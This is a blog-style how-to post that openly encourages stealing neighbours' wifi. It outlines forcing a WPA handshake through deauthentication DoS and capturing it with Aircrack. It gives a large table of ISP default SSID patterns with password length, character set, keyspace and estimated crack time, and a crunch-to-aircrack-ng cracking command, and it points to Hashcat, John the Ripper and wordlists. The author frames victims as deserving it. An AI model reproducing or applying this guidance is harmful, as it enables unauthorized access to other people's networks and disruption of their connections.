Once upon a time, the internet was fast. But then, corporates realised that people are fucking dumb and limited the speed at which it down/uploads (down/upstreams). Fight back by stealing wifi ! I mean, if people are silly enough to stick with the default passwords, they deserve it.

You will find that during certain hours, your internet will "slow down significantly". This is what is termed the "internet rush hour" and the ISP enforce limits on your connection. Rather than explain how to hack the router (UNLIMITED POWER!), i'll show you how to "borrow" from your neighbours and add to your own speed.

Demystifying how to hack wifi

There are 2 methods. The first is to obviously attack the router directly with a wordlist - which after a few failed attempts will get you blocked for a while, if not indefinately. This route is not worth it.

The other method is to listen for the "handshake" and then decode it. Handshake is when your device connects to the router and sends it the password (which is encrypted). Anyone with a clue would ask "Ah, but doesn't that mean you have to WAIT for that to happen" - well - we can force it by killing the connection with a DoS (Denial of Service - which could be illegal, thus you buy a wifi dongle JUST for this only !), which is very simple to do with routines such as Aircrack or MDK. Once this happens, Airsnort can capture the potential password file which you then need to crack. For the cracking, we need the parameters in which the password is likely to be - otherwise we could be there forever attempting this. The best method is to work out what ISP that wifi is using, and potential default passwords.

Below is a list of default settings various ISPs around the world use. I stole this list from a website At the end, I will try to add notes on various ones i've played with myself, including my own ISP (who stole hundreds from me, so fuck them too).

SSID

Length

Password Format

Combinations

Time

2WIREXXX

10

0-9

10,000,000,000

17 hrs

3MobileWiFi

8

0-9 a-z

2,821,109,907,456

7 mth

3Wireless-Modem-XXXX

8

0-9 A-F

(The first 4 digits are the same as the 4 digits on the SSID!)

65,536

1 sec

Alice_XXXXXXXX

24

0-9 a-z

22,452,257,707,354,557,240,087,211,123,792,674,816

Never

AOLBB-XXXXXX

8

0-9 A-Z

2,821,109,907,456

7 mth

ATT###

10

0-9

10,000,000,000

17 hrs

ATTxxxx 0000

10

0-9 A-Z

3,656,158,440,062,976

Never

ATTxxxxxxx

12

a-z + symbols

1,449,225,352,009,601,191,936

Never

belkin.xxx

8

2-9 a-f

1,475,789,056

2.5 hrs

belkin.xxxx

8

0-9 A-F

4,294,967,296

7.5 hrs

Belkin.XXXX

8

0-9 A-F

4,294,967,296

7.5 hrs

Belkin_XXXXXX

8

0-9 A-F

4,294,967,296

7.5 hrs

BigPondXXXXXX

10

0-9 A-F

1,099,511,627,776

2.5 mth

BOLT!SUPER 4G-XXXX

8

4 numbers + Last 4 of SSID

65,536

1 sec

BrightBox-XXXXXX

-

3 words, with hyphens in-between.

Lengths 3-4-5 or any combination.

 

Need dict.

BTHomeHub(1)-XXXX

10

0-9 a-f

1,099,511,627,776

2.5 mth

BTHomeHub2-XXXX

10

2-9 a-f

289,254,654,976

3 wks

BTHub3

10

2-9 a-f

289,254,654,976

3 wks

BTHub4

10

2-9 a-f

289,254,654,976

3 wks

BTHub5

10

2-9 a-f

289,254,654,976

3 wks

BTHub6

10, 12

0-9 a-z A-Z

100,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000

Never

CenturyLinkXXXX

14

0-9 a-f

72,057,594,037,927,936

Never

Cisco

26

0-9 a-f

43,608,742,899,428,874,059,776

Never

Digicom_XXXX

8

0-9 A-Z

2,821,109,907,456

7 mth

DJAWEB_#####

10

0-9

10,000,000,000

17 hrs

Domino-XXXX

8

0-9 A-F

4,294,967,296

7.5 hrs

E583x-xxxx

8

0-9

10,000,000

1 min

E583x-xxxxx

8

0-9 A-F

4,294,967,296

7.5 hrs

EasyBox 904 LTE

9

0-9 a-z A-Z

13,537,086,546,263,552

Never

EasyBox-######

9

0-9 A-F

68,719,476,736

5 days

EEBrightBox-XXXXXX

-

3 words, with hyphens in-between.

Lengths 3-4-5 or any combination.

 

Need dict.

FRITZ!Box Fon WLAN ####

16

0-9

10,000,000,000,000,000

Never

FrontierXXXX

10

0-9

10,000,000,000

17 hrs

Hitron

12

0-9 A-Z

(sometimes use the device’s serial number as the default key!)

4,738,381,338,321,616,896

Never

INFINITUM####

10

0-9

10,000,000,000

17 hrs

iPhone 5

?

Lowercase word plus 4 numbers

172000^65,536

Need dict.

Keenetic-XXXX

8

0-9 a-z A-Z

218,340,105,584,896

Never

Linkem_XXXXXX

8

0-9

10,000,000

1 min

Livebox-XXXX

?

?

 

 

mifi2

13

0-9 A-Z

170,581,728,179,578,208,256

Never

MobileWifi-xxxx

8

0-9

10,000,000

1 min

MYWIFI (EE)

-

MYWIFI + 4 numbers

65,536

1 sec

NETGEARXX

-

Adjective + Noun + 3 numbers

 

Need dict.

Netia-XXXXXX

13

0-9 a-f

4,503,599,627,370,496

Never

ONOXXXX

10

0-9

10,000,000,000

17 hrs

Orange-0a0aa0

8

0-9 a-f

4,294,967,296

7.5 hrs

 

Orange-AA0A00

12

0-9 A-F

281,474,976,710,656

Never

Orange-XXXX

8

2345679 ACEF

214,358,881

23 mins

PLDT

-

PLDTWIFI + Last 5 digits of router MAC

1

1 sec

Plusnet Broadband UK

64

a-z A-Z 0-9

-

Never

PlusnetWireless-XXXXXX

10

0-9 A-F

1,099,511,627,776

2.5 mth

PLUSNET-XXXXXX

10

0-9 a-f

1,099,511,627,776

2.5 mth

Sitecom_XXXX

8

0-9 A-F

4,294,967,296

7.5 hrs

SKYXXXXX

8

A-Z

http://www.ph-mb.com/products/sky-calc

208,827,064,576

2 wks

SpeedTouchXXXXXX

10

0-9 a-f

1,099,511,627,776

2.5 mth

TALKTALK-XXXXXX

8

346789 A-Z

(bar ILOSZ)

282,429,536,481

3 wks

TDC-####

9

0-9 a-f

68,719,476,736

5 days

Tech_XXXXXXXX

8

A-Z

208,827,064,576

15 days

Technicolor-Router

10

0-9 A-F

1,099,511,627,776

2.5 mth

Telecom-XXXXXXXX

?

?

 

 

TelstraXXXXXX

10

0-9 A-F

1,099,511,627,776

2.5 mth

TELUSXXXX

10

0-9 a-f

1,099,511,627,776

2.5 mth

Thomson

10

0-9 A-F

1,099,511,627,776

2.5 mth

ThomsonXXXXXX

10

0-9 a-f

1,099,511,627,776

2.5 mth

TIM_PN51T_XXXX

8

0-9

WPS PIN is 12345670

10,000,000

1 min

TNCAP-XXXX

10

0-9 A-F

1,099,511,627,776

2.5 mth

TNCAPXXXXXX

10

0-9 A-F

1,099,511,627,776

2.5 mth

TP-LINK_######

8

0-9

0-9 A-F

10,000,000

1 min

 

 

 

 

TRENDnet

TEW-123ABC

11

First 3 digits in SSID (123 here) + 8 digits

https://forums.kali.org/showthread.php?26366-TRENDnet-WPA-disclosure-amp-dictionaries

2,821,109,907,456

7 mth

TRKASHI-######

8

2 numbers, 6 digits

(10^2)^(26^6)

 

Need dict.

UNITE-XXXX

8

0-9

10,000,000

1 min

UPCXXXXXXX

8

A-Z

208,827,064,576

15 days

Verizon MIFIXXXX XXXX

11

0-9

100,000,000,000

7.5 days

virginmediaXXXXXX

8

a-z (bar iol)

78,310,985,281

6 days

VirginMobile MiFiXXXX XXX

11

0-9

100,000,000,000

7.5 days

VMXXXXXXX

12

0-9 a-z A-Z

3,226,266,762,397,899,821,056

Never

VMXXXXXXX-2G

8

a-z (bar iol)

78,310,985,281

6 days

VMXXXXXXX-5G

8

a-z (bar iol)

78,310,985,281

6 days

Vodaphone_XXXXXXXX

15

0-9 a-z

221,073,919,720,733,357,899,776

Never

WLAN1-XXXXXX

11

0-9 A-F

17,592,186,044,416

Never

ZyXELXXXXXX

13

10

0-9 A-Z

0-9 A-F

 

1,099,511,627,776

2.5 mth



The first tool you'll want is Aircrack which is a collection of fun tools that "sniff" wifi packets for handshakes after DoSing them offline. This one is needed to grab the packet containing the encrypted password. There are many tutorials on this online, thus I do not need to go over that here.

I will point to a routine that comes highly recommended (I've not used it myself, I have my own faster tools) for those who are interested in this kind of thing called Hashcat which is great, i'm told. I have attempted to use it, but it's just not for me.

Cracking the file

This part DOES depend on the default list above. Some ISPs passwords are only 8 digits long, which most modern systems could easily crack without the need of a wordlist. Those in excess of 10, you may want to consider using a pregenerated wordlist (crunch is the go to tool for this) and others use actual words.

If you are using crunch to generate and compare to the password file, then on a linux console the command would be;

crunch MIN MAX CHARSET [PARAMETERS] | aircrack-ng --bssid $BSSID -w- [CAPTURED_FILE]

If you are going down the wordlist route, then Hashcat would be your better option. The site even has a conversion tool for your captured file, along with a link to the forum on how to use it.

Now I have to bring up an old tool that i've used a few times, which is John the Ripper. Openwall links to many pregenerated wordlists for the more "obscure" defaults listed above, including wordlists. These are trivial to locate online in this day and will be MUCH faster than generating a bruteforce version of the list. If you are compiling JTR, I would recommend reading up on my optimising article on this site first - speed is always a bonus.

Once you have your pregenerated wordlists, you'll need a way to combine them into an attack. This is where a utility such as Hashcat could be of use if you don't have your own tools. A quick guide on how it's done can be found here.

I have uploaded a list of full English words of 3, 4 and 5 length, which you can easily use for multiple other wordlists, a list of English words here, and a list of all combinations 0-9 a-f (lowerhex) to here which I split into filesizes of 1Gb each in a 7zip file.

Enjoy and Hail Chaos
The_Original_Sin